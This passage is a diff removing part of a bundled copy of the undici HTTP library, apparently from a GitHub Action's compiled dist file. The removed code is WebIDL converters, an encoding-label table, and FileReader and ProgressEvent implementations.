-webidl.converters['unsigned short'] = function (V, opts) { - // 1. Let x be ? ConvertToInt(V, 16, "unsigned"). - const x = webidl.util.ConvertToInt(V, 16, 'unsigned', opts) - - // 2. Return the IDL unsigned short value that represents - // the same numeric value as x. - return x -} - -// https://webidl.spec.whatwg.org/#idl-ArrayBuffer -webidl.converters.ArrayBuffer = function (V, opts = {}) { - // 1. If Type(V) is not Object, or V does not have an - // [[ArrayBufferData]] internal slot, then throw a - // TypeError. - // see: https://tc39.es/ecma262/#sec-properties-of-the-arraybuffer-instances - // see: https://tc39.es/ecma262/#sec-properties-of-the-sharedarraybuffer-instances - if ( - webidl.util.Type(V) !== 'Object' || - !types.isAnyArrayBuffer(V) - ) { - throw webidl.errors.conversionFailed({ - prefix: `${V}`, - argument: `${V}`, - types: ['ArrayBuffer'] - }) - } - - // 2. If the conversion is not to an IDL type associated - // with the [AllowShared] extended attribute, and - // IsSharedArrayBuffer(V) is true, then throw a - // TypeError. - if (opts.allowShared === false && types.isSharedArrayBuffer(V)) { - throw webidl.errors.exception({ - header: 'ArrayBuffer', - message: 'SharedArrayBuffer is not allowed.' - }) - } - - // 3. If the conversion is not to an IDL type associated - // with the [AllowResizable] extended attribute, and - // IsResizableArrayBuffer(V) is true, then throw a - // TypeError. - // Note: resizable ArrayBuffers are currently a proposal. - - // 4. Return the IDL ArrayBuffer value that is a - // reference to the same object as V. - return V -} - -webidl.converters.TypedArray = function (V, T, opts = {}) { - // 1. Let T be the IDL type V is being converted to. - - // 2. If Type(V) is not Object, or V does not have a - // [[TypedArrayName]] internal slot with a value - // equal to T’s name, then throw a TypeError. - if ( - webidl.util.Type(V) !== 'Object' || - !types.isTypedArray(V) || - V.constructor.name !== T.name - ) { - throw webidl.errors.conversionFailed({ - prefix: `${T.name}`, - argument: `${V}`, - types: [T.name] - }) - } - - // 3. If the conversion is not to an IDL type associated - // with the [AllowShared] extended attribute, and - // IsSharedArrayBuffer(V.[[ViewedArrayBuffer]]) is - // true, then throw a TypeError. - if (opts.allowShared === false && types.isSharedArrayBuffer(V.buffer)) { - throw webidl.errors.exception({ - header: 'ArrayBuffer', - message: 'SharedArrayBuffer is not allowed.' - }) - } - - // 4. If the conversion is not to an IDL type associated - // with the [AllowResizable] extended attribute, and - // IsResizableArrayBuffer(V.[[ViewedArrayBuffer]]) is - // true, then throw a TypeError. - // Note: resizable array buffers are currently a proposal - - // 5. Return the IDL value of type T that is a reference - // to the same object as V. - return V -} - -webidl.converters.DataView = function (V, opts = {}) { - // 1. If Type(V) is not Object, or V does not have a - // [[DataView]] internal slot, then throw a TypeError. - if (webidl.util.Type(V) !== 'Object' || !types.isDataView(V)) { - throw webidl.errors.exception({ - header: 'DataView', - message: 'Object is not a DataView.' - }) - } - - // 2. If the conversion is not to an IDL type associated - // with the [AllowShared] extended attribute, and - // IsSharedArrayBuffer(V.[[ViewedArrayBuffer]]) is true, - // then throw a TypeError. - if (opts.allowShared === false && types.isSharedArrayBuffer(V.buffer)) { - throw webidl.errors.exception({ - header: 'ArrayBuffer', - message: 'SharedArrayBuffer is not allowed.' - }) - } - - // 3. If the conversion is not to an IDL type associated - // with the [AllowResizable] extended attribute, and - // IsResizableArrayBuffer(V.[[ViewedArrayBuffer]]) is - // true, then throw a TypeError. - // Note: resizable ArrayBuffers are currently a proposal - - // 4. Return the IDL DataView value that is a reference - // to the same object as V. - return V -} - -// https://webidl.spec.whatwg.org/#BufferSource -webidl.converters.BufferSource = function (V, opts = {}) { - if (types.isAnyArrayBuffer(V)) { - return webidl.converters.ArrayBuffer(V, opts) - } - - if (types.isTypedArray(V)) { - return webidl.converters.TypedArray(V, V.constructor) - } - - if (types.isDataView(V)) { - return webidl.converters.DataView(V, opts) - } - - throw new TypeError(`Could not convert ${V} to a BufferSource.`) -} - -webidl.converters['sequence'] = webidl.sequenceConverter( - webidl.converters.ByteString -) - -webidl.converters['sequence>'] = webidl.sequenceConverter( - webidl.converters['sequence'] -) - -webidl.converters['record'] = webidl.recordConverter( - webidl.converters.ByteString, - webidl.converters.ByteString -) - -module.exports = { - webidl -} - - -/***/ }), - -/***/ 4854: -/***/ ((module) => { - -"use strict"; - - -/** - * @see https://encoding.spec.whatwg.org/#concept-encoding-get - * @param {string|undefined} label - */ -function getEncoding (label) { - if (!label) { - return 'failure' - } - - // 1. Remove any leading and trailing ASCII whitespace from label. - // 2. If label is an ASCII case-insensitive match for any of the - // labels listed in the table below, then return the - // corresponding encoding; otherwise return failure. - switch (label.trim().toLowerCase()) { - case 'unicode-1-1-utf-8': - case 'unicode11utf8': - case 'unicode20utf8': - case 'utf-8': - case 'utf8': - case 'x-unicode20utf8': - return 'UTF-8' - case '866': - case 'cp866': - case 'csibm866': - case 'ibm866': - return 'IBM866' - case 'csisolatin2': - case 'iso-8859-2': - case 'iso-ir-101': - case 'iso8859-2': - case 'iso88592': - case 'iso_8859-2': - case 'iso_8859-2:1987': - case 'l2': - case 'latin2': - return 'ISO-8859-2' - case 'csisolatin3': - case 'iso-8859-3': - case 'iso-ir-109': - case 'iso8859-3': - case 'iso88593': - case 'iso_8859-3': - case 'iso_8859-3:1988': - case 'l3': - case 'latin3': - return 'ISO-8859-3' - case 'csisolatin4': - case 'iso-8859-4': - case 'iso-ir-110': - case 'iso8859-4': - case 'iso88594': - case 'iso_8859-4': - case 'iso_8859-4:1988': - case 'l4': - case 'latin4': - return 'ISO-8859-4' - case 'csisolatincyrillic': - case 'cyrillic': - case 'iso-8859-5': - case 'iso-ir-144': - case 'iso8859-5': - case 'iso88595': - case 'iso_8859-5': - case 'iso_8859-5:1988': - return 'ISO-8859-5' - case 'arabic': - case 'asmo-708': - case 'csiso88596e': - case 'csiso88596i': - case 'csisolatinarabic': - case 'ecma-114': - case 'iso-8859-6': - case 'iso-8859-6-e': - case 'iso-8859-6-i': - case 'iso-ir-127': - case 'iso8859-6': - case 'iso88596': - case 'iso_8859-6': - case 'iso_8859-6:1987': - return 'ISO-8859-6' - case 'csisolatingreek': - case 'ecma-118': - case 'elot_928': - case 'greek': - case 'greek8': - case 'iso-8859-7': - case 'iso-ir-126': - case 'iso8859-7': - case 'iso88597': - case 'iso_8859-7': - case 'iso_8859-7:1987': - case 'sun_eu_greek': - return 'ISO-8859-7' - case 'csiso88598e': - case 'csisolatinhebrew': - case 'hebrew': - case 'iso-8859-8': - case 'iso-8859-8-e': - case 'iso-ir-138': - case 'iso8859-8': - case 'iso88598': - case 'iso_8859-8': - case 'iso_8859-8:1988': - case 'visual': - return 'ISO-8859-8' - case 'csiso88598i': - case 'iso-8859-8-i': - case 'logical': - return 'ISO-8859-8-I' - case 'csisolatin6': - case 'iso-8859-10': - case 'iso-ir-157': - case 'iso8859-10': - case 'iso885910': - case 'l6': - case 'latin6': - return 'ISO-8859-10' - case 'iso-8859-13': - case 'iso8859-13': - case 'iso885913': - return 'ISO-8859-13' - case 'iso-8859-14': - case 'iso8859-14': - case 'iso885914': - return 'ISO-8859-14' - case 'csisolatin9': - case 'iso-8859-15': - case 'iso8859-15': - case 'iso885915': - case 'iso_8859-15': - case 'l9': - return 'ISO-8859-15' - case 'iso-8859-16': - return 'ISO-8859-16' - case 'cskoi8r': - case 'koi': - case 'koi8': - case 'koi8-r': - case 'koi8_r': - return 'KOI8-R' - case 'koi8-ru': - case 'koi8-u': - return 'KOI8-U' - case 'csmacintosh': - case 'mac': - case 'macintosh': - case 'x-mac-roman': - return 'macintosh' - case 'iso-8859-11': - case 'iso8859-11': - case 'iso885911': - case 'tis-620': - case 'windows-874': - return 'windows-874' - case 'cp1250': - case 'windows-1250': - case 'x-cp1250': - return 'windows-1250' - case 'cp1251': - case 'windows-1251': - case 'x-cp1251': - return 'windows-1251' - case 'ansi_x3.4-1968': - case 'ascii': - case 'cp1252': - case 'cp819': - case 'csisolatin1': - case 'ibm819': - case 'iso-8859-1': - case 'iso-ir-100': - case 'iso8859-1': - case 'iso88591': - case 'iso_8859-1': - case 'iso_8859-1:1987': - case 'l1': - case 'latin1': - case 'us-ascii': - case 'windows-1252': - case 'x-cp1252': - return 'windows-1252' - case 'cp1253': - case 'windows-1253': - case 'x-cp1253': - return 'windows-1253' - case 'cp1254': - case 'csisolatin5': - case 'iso-8859-9': - case 'iso-ir-148': - case 'iso8859-9': - case 'iso88599': - case 'iso_8859-9': - case 'iso_8859-9:1989': - case 'l5': - case 'latin5': - case 'windows-1254': - case 'x-cp1254': - return 'windows-1254' - case 'cp1255': - case 'windows-1255': - case 'x-cp1255': - return 'windows-1255' - case 'cp1256': - case 'windows-1256': - case 'x-cp1256': - return 'windows-1256' - case 'cp1257': - case 'windows-1257': - case 'x-cp1257': - return 'windows-1257' - case 'cp1258': - case 'windows-1258': - case 'x-cp1258': - return 'windows-1258' - case 'x-mac-cyrillic': - case 'x-mac-ukrainian': - return 'x-mac-cyrillic' - case 'chinese': - case 'csgb2312': - case 'csiso58gb231280': - case 'gb2312': - case 'gb_2312': - case 'gb_2312-80': - case 'gbk': - case 'iso-ir-58': - case 'x-gbk': - return 'GBK' - case 'gb18030': - return 'gb18030' - case 'big5': - case 'big5-hkscs': - case 'cn-big5': - case 'csbig5': - case 'x-x-big5': - return 'Big5' - case 'cseucpkdfmtjapanese': - case 'euc-jp': - case 'x-euc-jp': - return 'EUC-JP' - case 'csiso2022jp': - case 'iso-2022-jp': - return 'ISO-2022-JP' - case 'csshiftjis': - case 'ms932': - case 'ms_kanji': - case 'shift-jis': - case 'shift_jis': - case 'sjis': - case 'windows-31j': - case 'x-sjis': - return 'Shift_JIS' - case 'cseuckr': - case 'csksc56011987': - case 'euc-kr': - case 'iso-ir-149': - case 'korean': - case 'ks_c_5601-1987': - case 'ks_c_5601-1989': - case 'ksc5601': - case 'ksc_5601': - case 'windows-949': - return 'EUC-KR' - case 'csiso2022kr': - case 'hz-gb-2312': - case 'iso-2022-cn': - case 'iso-2022-cn-ext': - case 'iso-2022-kr': - case 'replacement': - return 'replacement' - case 'unicodefffe': - case 'utf-16be': - return 'UTF-16BE' - case 'csunicode': - case 'iso-10646-ucs-2': - case 'ucs-2': - case 'unicode': - case 'unicodefeff': - case 'utf-16': - case 'utf-16le': - return 'UTF-16LE' - case 'x-user-defined': - return 'x-user-defined' - default: return 'failure' - } -} - -module.exports = { - getEncoding -} - - -/***/ }), - -/***/ 1446: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - staticPropertyDescriptors, - readOperation, - fireAProgressEvent -} = __nccwpck_require__(7530) -const { - kState, - kError, - kResult, - kEvents, - kAborted -} = __nccwpck_require__(9054) -const { webidl } = __nccwpck_require__(1744) -const { kEnumerableProperty } = __nccwpck_require__(3983) - -class FileReader extends EventTarget { - constructor () { - super() - - this[kState] = 'empty' - this[kResult] = null - this[kError] = null - this[kEvents] = { - loadend: null, - error: null, - abort: null, - load: null, - progress: null, - loadstart: null - } - } - - /** - * @see https://w3c.github.io/FileAPI/#dfn-readAsArrayBuffer - * @param {import('buffer').Blob} blob - */ - readAsArrayBuffer (blob) { - webidl.brandCheck(this, FileReader) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsArrayBuffer' }) - - blob = webidl.converters.Blob(blob, { strict: false }) - - // The readAsArrayBuffer(blob) method, when invoked, - // must initiate a read operation for blob with ArrayBuffer. - readOperation(this, blob, 'ArrayBuffer') - } - - /** - * @see https://w3c.github.io/FileAPI/#readAsBinaryString - * @param {import('buffer').Blob} blob - */ - readAsBinaryString (blob) { - webidl.brandCheck(this, FileReader) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsBinaryString' }) - - blob = webidl.converters.Blob(blob, { strict: false }) - - // The readAsBinaryString(blob) method, when invoked, - // must initiate a read operation for blob with BinaryString. - readOperation(this, blob, 'BinaryString') - } - - /** - * @see https://w3c.github.io/FileAPI/#readAsDataText - * @param {import('buffer').Blob} blob - * @param {string?} encoding - */ - readAsText (blob, encoding = undefined) { - webidl.brandCheck(this, FileReader) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsText' }) - - blob = webidl.converters.Blob(blob, { strict: false }) - - if (encoding !== undefined) { - encoding = webidl.converters.DOMString(encoding) - } - - // The readAsText(blob, encoding) method, when invoked, - // must initiate a read operation for blob with Text and encoding. - readOperation(this, blob, 'Text', encoding) - } - - /** - * @see https://w3c.github.io/FileAPI/#dfn-readAsDataURL - * @param {import('buffer').Blob} blob - */ - readAsDataURL (blob) { - webidl.brandCheck(this, FileReader) - - webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsDataURL' }) - - blob = webidl.converters.Blob(blob, { strict: false }) - - // The readAsDataURL(blob) method, when invoked, must - // initiate a read operation for blob with DataURL. - readOperation(this, blob, 'DataURL') - } - - /** - * @see https://w3c.github.io/FileAPI/#dfn-abort - */ - abort () { - // 1. If this's state is "empty" or if this's state is - // "done" set this's result to null and terminate - // this algorithm. - if (this[kState] === 'empty' || this[kState] === 'done') { - this[kResult] = null - return - } - - // 2. If this's state is "loading" set this's state to - // "done" and set this's result to null. - if (this[kState] === 'loading') { - this[kState] = 'done' - this[kResult] = null - } - - // 3. If there are any tasks from this on the file reading - // task source in an affiliated task queue, then remove - // those tasks from that task queue. - this[kAborted] = true - - // 4. Terminate the algorithm for the read method being processed. - // TODO - - // 5. Fire a progress event called abort at this. - fireAProgressEvent('abort', this) - - // 6. If this's state is not "loading", fire a progress - // event called loadend at this. - if (this[kState] !== 'loading') { - fireAProgressEvent('loadend', this) - } - } - - /** - * @see https://w3c.github.io/FileAPI/#dom-filereader-readystate - */ - get readyState () { - webidl.brandCheck(this, FileReader) - - switch (this[kState]) { - case 'empty': return this.EMPTY - case 'loading': return this.LOADING - case 'done': return this.DONE - } - } - - /** - * @see https://w3c.github.io/FileAPI/#dom-filereader-result - */ - get result () { - webidl.brandCheck(this, FileReader) - - // The result attribute’s getter, when invoked, must return - // this's result. - return this[kResult] - } - - /** - * @see https://w3c.github.io/FileAPI/#dom-filereader-error - */ - get error () { - webidl.brandCheck(this, FileReader) - - // The error attribute’s getter, when invoked, must return - // this's error. - return this[kError] - } - - get onloadend () { - webidl.brandCheck(this, FileReader) - - return this[kEvents].loadend - } - - set onloadend (fn) { - webidl.brandCheck(this, FileReader) - - if (this[kEvents].loadend) { - this.removeEventListener('loadend', this[kEvents].loadend) - } - - if (typeof fn === 'function') { - this[kEvents].loadend = fn - this.addEventListener('loadend', fn) - } else { - this[kEvents].loadend = null - } - } - - get onerror () { - webidl.brandCheck(this, FileReader) - - return this[kEvents].error - } - - set onerror (fn) { - webidl.brandCheck(this, FileReader) - - if (this[kEvents].error) { - this.removeEventListener('error', this[kEvents].error) - } - - if (typeof fn === 'function') { - this[kEvents].error = fn - this.addEventListener('error', fn) - } else { - this[kEvents].error = null - } - } - - get onloadstart () { - webidl.brandCheck(this, FileReader) - - return this[kEvents].loadstart - } - - set onloadstart (fn) { - webidl.brandCheck(this, FileReader) - - if (this[kEvents].loadstart) { - this.removeEventListener('loadstart', this[kEvents].loadstart) - } - - if (typeof fn === 'function') { - this[kEvents].loadstart = fn - this.addEventListener('loadstart', fn) - } else { - this[kEvents].loadstart = null - } - } - - get onprogress () { - webidl.brandCheck(this, FileReader) - - return this[kEvents].progress - } - - set onprogress (fn) { - webidl.brandCheck(this, FileReader) - - if (this[kEvents].progress) { - this.removeEventListener('progress', this[kEvents].progress) - } - - if (typeof fn === 'function') { - this[kEvents].progress = fn - this.addEventListener('progress', fn) - } else { - this[kEvents].progress = null - } - } - - get onload () { - webidl.brandCheck(this, FileReader) - - return this[kEvents].load - } - - set onload (fn) { - webidl.brandCheck(this, FileReader) - - if (this[kEvents].load) { - this.removeEventListener('load', this[kEvents].load) - } - - if (typeof fn === 'function') { - this[kEvents].load = fn - this.addEventListener('load', fn) - } else { - this[kEvents].load = null - } - } - - get onabort () { - webidl.brandCheck(this, FileReader) - - return this[kEvents].abort - } - - set onabort (fn) { - webidl.brandCheck(this, FileReader) - - if (this[kEvents].abort) { - this.removeEventListener('abort', this[kEvents].abort) - } - - if (typeof fn === 'function') { - this[kEvents].abort = fn - this.addEventListener('abort', fn) - } else { - this[kEvents].abort = null - } - } -} - -// https://w3c.github.io/FileAPI/#dom-filereader-empty -FileReader.EMPTY = FileReader.prototype.EMPTY = 0 -// https://w3c.github.io/FileAPI/#dom-filereader-loading -FileReader.LOADING = FileReader.prototype.LOADING = 1 -// https://w3c.github.io/FileAPI/#dom-filereader-done -FileReader.DONE = FileReader.prototype.DONE = 2 - -Object.defineProperties(FileReader.prototype, { - EMPTY: staticPropertyDescriptors, - LOADING: staticPropertyDescriptors, - DONE: staticPropertyDescriptors, - readAsArrayBuffer: kEnumerableProperty, - readAsBinaryString: kEnumerableProperty, - readAsText: kEnumerableProperty, - readAsDataURL: kEnumerableProperty, - abort: kEnumerableProperty, - readyState: kEnumerableProperty, - result: kEnumerableProperty, - error: kEnumerableProperty, - onloadstart: kEnumerableProperty, - onprogress: kEnumerableProperty, - onload: kEnumerableProperty, - onabort: kEnumerableProperty, - onerror: kEnumerableProperty, - onloadend: kEnumerableProperty, - [Symbol.toStringTag]: { - value: 'FileReader', - writable: false, - enumerable: false, - configurable: true - } -}) - -Object.defineProperties(FileReader, { - EMPTY: staticPropertyDescriptors, - LOADING: staticPropertyDescriptors, - DONE: staticPropertyDescriptors -}) - -module.exports = { - FileReader -} - - -/***/ }), - -/***/ 5504: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { webidl } = __nccwpck_require__(1744) - -const kState = Symbol('ProgressEvent state') - -/** - * @see https://xhr.spec.whatwg.org/#progressevent - */ -class ProgressEvent extends Event { - constructor (type, eventInitDict = {}) { - type = webidl.converters.DOMString(type) - eventInitDict = webidl.converters.ProgressEventInit(eventInitDict ?? {}) - - super(type, eventInitDict) - - this[kState] = { - lengthComputable: eventInitDict.lengthComputable, - loaded: eventInitDict.loaded, - total: eventInitDict.total - } - } - - get lengthComputable () { - webidl.brandCheck(this, ProgressEvent) - - return this[kState].lengthComputable - } - - get loaded () { - webidl.brandCheck(this, ProgressEvent) - - return this[kState].loaded - } - - get total () { - webidl.brandCheck(this, ProgressEvent) - - return this[kState].total - } -} - -webidl.converters.ProgressEventInit = webidl.dictionaryConverter([ - { - key: 'lengthComputable', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'loaded', - converter: webidl.converters['unsigned long long'], - defaultValue: 0 - }, - { - key: 'total', - converter: webidl.converters['unsigned long long'], - defaultValue: 0 - }, - { - key: 'bubbles', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'cancelable', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'composed', - converter: webidl.converters.boolean, - defaultValue: false - } -]) - -module.exports = { - ProgressEvent -} - - -/***/ }), - -/***/ 9054: -/***/ ((module) => { - -"use strict"; - - -module.exports = { - kState: Symbol('FileReader state'), - kResult: Symbol('FileReader result'), - kError: Symbol('FileReader error'), - kLastProgressEventFired: Symbol('FileReader last progress event fired timestamp'), - kEvents: Symbol('FileReader events'), - kAborted: Symbol('FileReader aborted') -} - - -/***/ }), - -/***/ 7530: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - kState, - kError, - kResult, - kAborted, - kLastProgressEventFired -} = __nccwpck_require__(9054) -const { ProgressEvent } = __nccwpck_require__(5504) -const { getEncoding } = __nccwpck_require__(4854) -const { DOMException } = __nccwpck_require__(1037) -const { serializeAMimeType, parseMIMEType } = __nccwpck_require__(685) -const { types } = __nccwpck_require__(3837) -const { StringDecoder } = __nccwpck_require__(1576) -const { btoa } = __nccwpck_require__(4300) - -/** @type {PropertyDescriptor} */ -const staticPropertyDescriptors = { - enumerable: true, - writable: false, - configurable: false -} - -/** - * @see https://w3c.github.io/FileAPI/#readOperation - * @param {import('./filereader').FileReader} fr - * @param {import('buffer').Blob} blob - * @param {string} type - * @param {string?} encodingName - */ -function readOperation (fr, blob, type, encodingName) { - // 1. If fr’s state is "loading", throw an InvalidStateError - // DOMException. - if (fr[kState] === 'loading') { - throw new DOMException('Invalid state', 'InvalidStateError') - } - - // 2. Set fr’s state to "loading". - fr[kState] = 'loading' - - // 3. Set fr’s result to null. - fr[kResult] = null - - // 4. Set fr’s error to null. - fr[kError] = null - - // 5. Let stream be the result of calling get stream on blob. - /** @type {import('stream/web').ReadableStream} */ - const stream = blob.stream() - - // 6. Let reader be the result of getting a reader from stream. - const reader = stream.getReader() - - // 7. Let bytes be an empty byte sequence. - /** @type {Uint8Array[]} */ - const bytes = [] - - // 8. Let chunkPromise be the result of reading a chunk from - // stream with reader. - let chunkPromise = reader.read() - - // 9. Let isFirstChunk be true. - let isFirstChunk = true - - // 10. In parallel, while true: - // Note: "In parallel" just means non-blocking - // Note 2: readOperation itself cannot be async as double - // reading the body would then reject the promise, instead - // of throwing an error. - ;(async () => { - while (!fr[kAborted]) { - // 1. Wait for chunkPromise to be fulfilled or rejected. - try { - const { done, value } = await chunkPromise - - // 2. If chunkPromise is fulfilled, and isFirstChunk is - // true, queue a task to fire a progress event called - // loadstart at fr. - if (isFirstChunk && !fr[kAborted]) { - queueMicrotask(() => { - fireAProgressEvent('loadstart', fr) - }) - } - - // 3. Set isFirstChunk to false. - isFirstChunk = false - - // 4. If chunkPromise is fulfilled with an object whose - // done property is false and whose value property is - // a Uint8Array object, run these steps: - if (!done && types.isUint8Array(value)) { - // 1. Let bs be the byte sequence represented by the - // Uint8Array object. - - // 2. Append bs to bytes. - bytes.push(value) - - // 3. If roughly 50ms have passed since these steps - // were last invoked, queue a task to fire a - // progress event called progress at fr. - if ( - ( - fr[kLastProgressEventFired] === undefined || - Date.now() - fr[kLastProgressEventFired] >= 50 - ) && - !fr[kAborted] - ) { - fr[kLastProgressEventFired] = Date.now() - queueMicrotask(() => { - fireAProgressEvent('progress', fr) - }) - } - - // 4. Set chunkPromise to the result of reading a - // chunk from stream with reader. - chunkPromise = reader.read() - } else if (done) { - // 5. Otherwise, if chunkPromise is fulfilled with an - // object whose done property is true, queue a task - // to run the following steps and abort this algorithm: - queueMicrotask(() => { - // 1. Set fr’s state to "done". - fr[kState] = 'done' - - // 2. Let result be the result of package data given - // bytes, type, blob’s type, and encodingName. - try { - const result = packageData(bytes, type, blob.type, encodingName) - - // 4. Else: - - if (fr[kAborted]) { - return - } - - // 1. Set fr’s result to result. - fr[kResult] = result - - // 2. Fire a progress event called load at the fr. - fireAProgressEvent('load', fr) - } catch (error) { - // 3. If package data threw an exception error: - - // 1. Set fr’s error to error. - fr[kError] = error - - // 2. Fire a progress event called error at fr. - fireAProgressEvent('error', fr) - } - - // 5. If fr’s state is not "loading", fire a progress - // event called loadend at the fr. - if (fr[kState] !== 'loading') { - fireAProgressEvent('loadend', fr) - } - }) - - break - } - } catch (error) { - if (fr[kAborted]) { - return - } - - // 6. Otherwise, if chunkPromise is rejected with an - // error error, queue a task to run the following - // steps and abort this algorithm: - queueMicrotask(() => { - // 1. Set fr’s state to "done". - fr[kState] = 'done' - - // 2. Set fr’s error to error. - fr[kError] = error - - // 3. Fire a progress event called error at fr. - fireAProgressEvent('error', fr) - - // 4. If fr’s state is not "loading", fire a progress - // event called loadend at fr. - if (fr[kState] !== 'loading') { - fireAProgressEvent('loadend', fr) - } - }) - - break - } - } - })() -} - -/** - * @see https://w3c.github.io/FileAPI/#fire-a-progress-event - * @see https://dom.spec.whatwg.org/#concept-event-fire - * @param {string} e The name of the event - * @param {import('./filereader').FileReader} reader - */ -function fireAProgressEvent (e, reader) { - // The progress event e does not bubble. e.bubbles must be false - // The progress event e is NOT cancelable. e.cancelable must be false - const event = new ProgressEvent(e, { - bubbles: false, - cancelable: false - }) - - reader.dispatchEvent(event) -} - -/** - * @see https://w3c.github.io/FileAPI/#blob-package-data - * @param {Uint8Array[]} bytes - * @param {string} type - * @param {string?} mimeType - * @param {string?} encodingName - */ -function packageData (bytes, type, mimeType, encodingName) { - // 1. A Blob has an associated package data algorithm, given - // bytes, a type, a optional mimeType, and a optional - // encodingName, which switches on type and runs the - // associated steps: - - switch (type) { - case 'DataURL': { - // 1. Return bytes as a DataURL [RFC2397] subject to - // the considerations below: - // * Use mimeType as part of the Data URL if it is - // available in keeping with the Data URL - // specification [RFC2397]. - // * If mimeType is not available return a Data URL - // without a media-type. [RFC2397]. - - // https://datatracker.ietf.org/doc/html/rfc2397#section-3 - // dataurl := "data:" [ mediatype ] [ ";base64" ] "," data - // mediatype := [ type "/" subtype ] *( ";" parameter ) - // data := *urlchar - // parameter := attribute "=" value - let dataURL = 'data:' - - const parsed = parseMIMEType(mimeType || 'application/octet-stream') - - if (parsed !== 'failure') { - dataURL += serializeAMimeType(parsed) - } - - dataURL += ';base64,' - - const decoder = new StringDecoder('latin1') - - for (const chunk of bytes) { - dataURL += btoa(decoder.write(chunk)) - } - - dataURL += btoa(decoder.end()) - - return dataURL - } - case 'Text': { - // 1. Let encoding be failure - let encoding = 'failure' - - // 2. If the encodingName is present, set encoding to the - // result of getting an encoding from encodingName. - if (encodingName) { - encoding = getEncoding(encodingName) - } - - // 3. If encoding is failure, and mimeType is present: - if (encoding === 'failure' && mimeType) { - // 1. Let type be the result of parse a MIME type - // given mimeType. - const type = parseMIMEType(mimeType) - - // 2. If type is not failure, set encoding to the result - // of getting an encoding from type’s parameters["charset"]. - if (type !== 'failure') { - encoding = getEncoding(type.parameters.get('charset')) - } - } - - // 4. If encoding is failure, then set encoding to UTF-8. - if (encoding === 'failure') { - encoding = 'UTF-8' - } - - // 5. Decode bytes using fallback encoding encoding, and - // return the result. - return decode(bytes, encoding) - } - case 'ArrayBuffer': { - // Return a new ArrayBuffer whose contents are bytes. - const sequence = combineByteSequences(bytes) - - return sequence.buffer - } - case 'BinaryString': { - // Return bytes as a binary string, in which every byte - // is represented by a code unit of equal value [0..255]. - let binaryString = '' - - const decoder = new StringDecoder('latin1') - - for (const chunk of bytes) { - binaryString += decoder.write(chunk) - } - - binaryString += decoder.end() - - return binaryString - } - } -} - -/** - * @see https://encoding.spec.whatwg.org/#decode - * @param {Uint8Array[]} ioQueue - * @param {string} encoding - */ -function decode (ioQueue, encoding) { - const bytes = combineByteSequences(ioQueue) - - // 1. Let BOMEncoding be the result of BOM sniffing ioQueue. - const BOMEncoding = BOMSniffing(bytes) - - let slice = 0 - - // 2. If BOMEncoding is non-null: - if (BOMEncoding !== null) { - // 1. Set encoding to BOMEncoding. - encoding = BOMEncoding - - // 2. Read three bytes from ioQueue, if BOMEncoding is - // UTF-8; otherwise read two bytes. - // (Do nothing with those bytes.) - slice = BOMEncoding === 'UTF-8' ? 3 : 2 - } - - // 3. Process a queue with an instance of encoding’s - // decoder, ioQueue, output, and "replacement". - - // 4. Return output. - - const sliced = bytes.slice(slice) - return new TextDecoder(encoding).decode(sliced) -} - -/** - * @see https://encoding.spec.whatwg.org/#bom-sniff - * @param {Uint8Array} ioQueue - */ -function BOMSniffing (ioQueue) { - // 1. Let BOM be the result of peeking 3 bytes from ioQueue, - // converted to a byte sequence. - const [a, b, c] = ioQueue - - // 2. For each of the rows in the table below, starting with - // the first one and going down, if BOM starts with the - // bytes given in the first column, then return the - // encoding given in the cell in the second column of that - // row. Otherwise, return null. - if (a === 0xEF && b === 0xBB && c === 0xBF) { - return 'UTF-8' - } else if (a === 0xFE && b === 0xFF) { - return 'UTF-16BE' - } else if (a === 0xFF && b === 0xFE) { - return 'UTF-16LE' - } - - return null -} - -/** - * @param {Uint8Array[]} sequences - */ -function combineByteSequences (sequences) { - const size = sequences.reduce((a, b) => { - return a + b.byteLength - }, 0) - - let offset = 0 - - return sequences.reduce((a, b) => { - a.set(b, offset) - offset += b.byteLength - return a - }, new Uint8Array(size)) -} - -module.exports = { - staticPropertyDescriptors, - readOperation, - fireAProgressEvent -} - - -/***/ }), - -/***/ 1892: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -// We include a version number for the Dispatcher API. In case of breaking changes, -// this version number must be increased to avoid conflicts. -const globalDispatcher = Symbol.for('undici.globalDispatcher.1') -const { InvalidArgumentError } = __nccwpck_require__(8045) -const Agent = __nccwpck_require__(7890) - -if (getGlobalDispatcher() === undefined) { - setGlobalDispatcher(new Agent()) -} - -function setGlobalDispatcher (agent) { - if (!agent || typeof agent.dispatch !== 'function') { - throw new InvalidArgumentError('Argument agent must implement Agent') - } - Object.defineProperty(globalThis, globalDispatcher, { - value: agent, - writable: true, - enumerable: false, - configurable: false - }) -} - -function getGlobalDispatcher () { - return globalThis[globalDispatcher] -} - -module.exports = { - setGlobalDispatcher, - getGlobalDispatcher -} - - -/***/ }), - -/***/ 6930: -/***/ ((module) => { - -"use strict"; - - -module.exports = class DecoratorHandler { - constructor (handler) { - this.handler = handler - } - - onConnect (...args) { - return this.handler.onConnect(...args) - } - - onError (...args) { - return this.handler.onError(...args) - } - - onUpgrade (...args) { - return this.handler.onUpgrade(...args) - } - - onHeaders (...args) { - return this.handler.onHeaders(...args) - } - - onData (...args) { - return this.handler.onData(...args) - } - - onComplete (...args) { - return this.handler.onComplete(...args) - } - - onBodySent (...args) { - return this.handler.onBodySent(...args) - } -} - - -/***/ }), - -/***/ 2860: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const util = __nccwpck_require__(3983) -const { kBodyUsed } = __nccwpck_require__(2785) -const assert = __nccwpck_require__(9491) -const { InvalidArgumentError } = __nccwpck_require__(8045) -const EE = __nccwpck_require__(2361) - -const redirectableStatusCodes = [300, 301, 302, 303, 307, 308] - -const kBody = Symbol('body') - -class BodyAsyncIterable { - constructor (body) { - this[kBody] = body - this[kBodyUsed] = false - } - - async * 